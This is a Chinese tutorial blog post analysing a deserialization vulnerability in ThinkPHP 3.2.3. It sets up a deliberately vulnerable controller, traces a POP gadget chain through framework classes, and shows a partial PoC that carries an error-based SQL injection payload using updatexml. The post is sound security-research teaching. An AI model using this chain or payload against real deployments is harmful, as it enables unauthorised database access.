当前位置:首页 > CMS教程 > Thinkphp > 列表

Thinkphp3.2.3反序列化漏洞实例分析

发布:smiling 来源: PHP粉丝网  添加日期:2023-06-26 11:53:27 浏览: 评论:0 

ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。随着框架代码量的增加,一些潜在的威胁也逐渐暴露,本文给大家带来的是对Thinkphp3.2.3版本框架里面的反序列化漏洞进行分析,浅谈原理以及如何应用。

魔术方法

因为之前已经讲过了,这里就简单提一下,以下面这个魔术方法为例:

_destruct

该方法的作用是,某个对象的所有引用都被删除或者当对象被显式销毁时执行。例如下面代码:

  1. <?php 
  2. class User{ 
  3.     public function __destruct() 
  4.     { 
  5.         echo "xino</br>"
  6.     } 
  7. $test = new User(); 
  8. $ser = serialize($test); 
  9. unserialize($ser); 
  10. ?> 

执行后会发现调用了魔术方法,我们要想办法来寻找代码之间的关系来构造 反序列化链,常见魔术方法如下:

Thinkphp3.2.3反序列化漏洞实例分析

了解完魔术方法如何触发后便开始我们TP3反序列化漏洞的学习之旅。

复现

这里我是用小皮面板搭建好环境后开始我们的分析,下面是主界面:

Thinkphp3.2.3反序列化漏洞实例分析

需要在控制器IndexController.class.php 处写入:

  1. public function index(){ 
  2.     unserialize(base64_decode($_GET[1])); 

首先走到Library/Think/Image/Driver/Imagick.class.php,代码如下:

  1. public function __destruct() 
  2.     { 
  3.         emptyempty($this->img) || $this->img->destroy(); 
  4.     } 

这里有一个可控的变量img,因为该变量走向了destory(),于是我们寻找一下:

Library/Think/Session/Driver/Memcache.class.php ,该处有个一样的方法:

  1. public function destroy($sessID
  2.    { 
  3.        return $this->handle->delete($this->sessionName . $sessID); 
  4.    } 

我们会发现handle和sessionName参数是可控,因为走向了delete函数,于是继续跟进寻找delete,在Mode/Lite/Model.class.php 处:

  1. public function delete($options = array()) 
  2.  { 
  3.      $pk = $this->getPk(); 
  4.      if (emptyempty($options) && emptyempty($this->options['where'])) { 
  5.          // 如果删除条件为空 则删除当前数据对象所对应的记录 
  6.          if (!emptyempty($this->data) && isset($this->data[$pk])) { 
  7.              return $this->delete($this->data[$pk]); 
  8.          } else { 
  9.              return false; 
  10.          } 
  11.      } 
  12.      if (is_numeric($options) || is_string($options)) { 
  13.          // 根据主键删除记录 
  14.          if (strpos($options',')) { 
  15.              $where[$pk] = array('IN'$options); 
  16.          } else { 
  17.              $where[$pk] = $options
  18.          } 
  19.          $options          = array(); 
  20.          $options['where'] = $where
  21.      } 
  22.      // 根据复合主键删除记录 
  23.      if (is_array($options) && (count($options) > 0) && is_array($pk)) { 
  24.          $count = 0; 
  25.          foreach (array_keys($optionsas $key) { 
  26.              if (is_int($key)) { 
  27.                  $count++; 
  28.              } 
  29.          } 
  30.          if (count($pk) == $count) { 
  31.              $i = 0; 
  32.              foreach ($pk as $field) { 
  33.                  $where[$field] = $options[$i]; 
  34.                  unset($options[$i++]); 
  35.              } 
  36.              $options['where'] = $where
  37.          } else { 
  38.              return false; 
  39.          } 
  40.      } 
  41.      // 分析表达式 
  42.      $options = $this->_parseOptions($options); 
  43.      if (emptyempty($options['where'])) { 
  44.          // 如果条件为空 不进行删除操作 除非设置 1=1 
  45.          return false; 
  46.      } 
  47.      if (is_array($options['where']) && isset($options['where'][$pk])) { 
  48.          $pkValue = $options['where'][$pk]; 
  49.      } 
  50.      if (false === $this->_before_delete($options)) { 
  51.          return false; 
  52.      } 
  53.      $result = $this->db->delete($options);        //数据库驱动类中的delete() 
  54.      if (false !== $result && is_numeric($result)) { 
  55.          $data = array(); 
  56.          if (isset($pkValue)) { 
  57.              $data[$pk] = $pkValue
  58.          } 
  59.          $this->_after_delete($data$options); 
  60.      } 
  61.      // 返回删除记录个数 
  62.      return $result
  63.  } 

这里比较复杂,需要分析一下,pk,pk,pk,data,$options参数都是可控的,第二次调用该函数后是调用db(Library/Think/Db/Driver.class.php )里面的函数,进去看一下:

  1. $table = $this-&gt;parseTable($options['table']); 
  2. $sql   = 'DELETE FROM ' . $table
  3. return $this-&gt;execute($sql, !emptyempty($options['fetch_sql']) ? true : false); 

这里只贴了比较关键的代码,看到table经过parseTable处理之后进了sql语句,跟进了发现没有过滤什么,直接返回了数据,最后调用了execute,我们分析其代码:

  1. public function execute($str,$fetchSql=false) { 
  2.        $this->initConnect(true); 
  3.        if ( !$this->_linkID ) return false; 
  4.        $this->queryStr = $str
  5.        if(!emptyempty($this->bind)){ 
  6.            $that   =   $this
  7.            $this->queryStr =   strtr($this->queryStr,array_map(function($valuse($that){ return '''.$that->escapeString($val).'''; },$this->bind)); 
  8.        } 
  9.        if($fetchSql){ 
  10.            return $this->queryStr; 
  11.        } 

看到第二行是一个初始化连接的代码,我们跟进到最后发现:

  1. public function connect($config = ''$linkNum = 0, $autoConnection = false) 
  2.    { 
  3.        if (!isset($this->linkID[$linkNum])) { 
  4.            if (emptyempty($config)) { 
  5.                $config = $this->config; 
  6.            } 
  7.            try { 
  8.                if (emptyempty($config['dsn'])) { 
  9.                    $config['dsn'] = $this->parseDsn($config); 
  10.                } 
  11.                if (version_compare(PHP_VERSION, '5.3.6''<=')) { 
  12.                    // 禁用模拟预处理语句 
  13.                    $this->options[PDO::ATTR_EMULATE_PREPARES] = false; 
  14.                } 
  15.                $this->linkID[$linkNum] = new PDO($config['dsn'], $config['username'], $config['password'], $this->options); 
  16.            } catch (\PDOException $e) { 
  17.                if ($autoConnection) { 
  18.                    trace($e->getMessage(), '''ERR'); 
  19.                    return $this->connect($autoConnection$linkNum); 
  20.                } elseif ($config['debug']) { 
  21.                    E($e->getMessage()); 
  22.                } 
  23.            } 
  24.        } 
  25.        return $this->linkID[$linkNum]; 
  26.    } 

可以通过里面的相应代码:

$this->config

建立数据库连接,整个的POP链跟进顺序如下:

__destruct()->destroy()->delete()->Driver::delete()->Driver::execute()->Driver::initConnect()->Driver::connect()->

因为构造poc较长,这里只贴关键处,有兴趣的小伙伴可以自行去构造:

  1. public function __construct(){ 
  2.           $this->db = new Mysql(); 
  3.           $this->options['where'] = ''
  4.           $this->pk = 'id'
  5.           $this->data[$this->pk] = array
  6.               "table" => "name where 1=updatexml(1,user(),1)#"
  7.               "where" => "1=1" 
  8.           ); } 

生成后传入payload即可实现错报注入,体现在payload里就是table这个语句,经过一串的操作使之与数据库连接来执行sql语句:

Thinkphp3.2.3反序列化漏洞实例分析

结语:给大家带来了tp3的反序列化漏洞分析,主要还是要理清各个链的关系以及如何让它们联系起来,有兴趣的小伙伴可以自己去搭建尝试,喜欢本文的小伙伴希望可以一键三连支持一下。

Tags: Thinkphp3.2.3反序列化漏洞

分享到: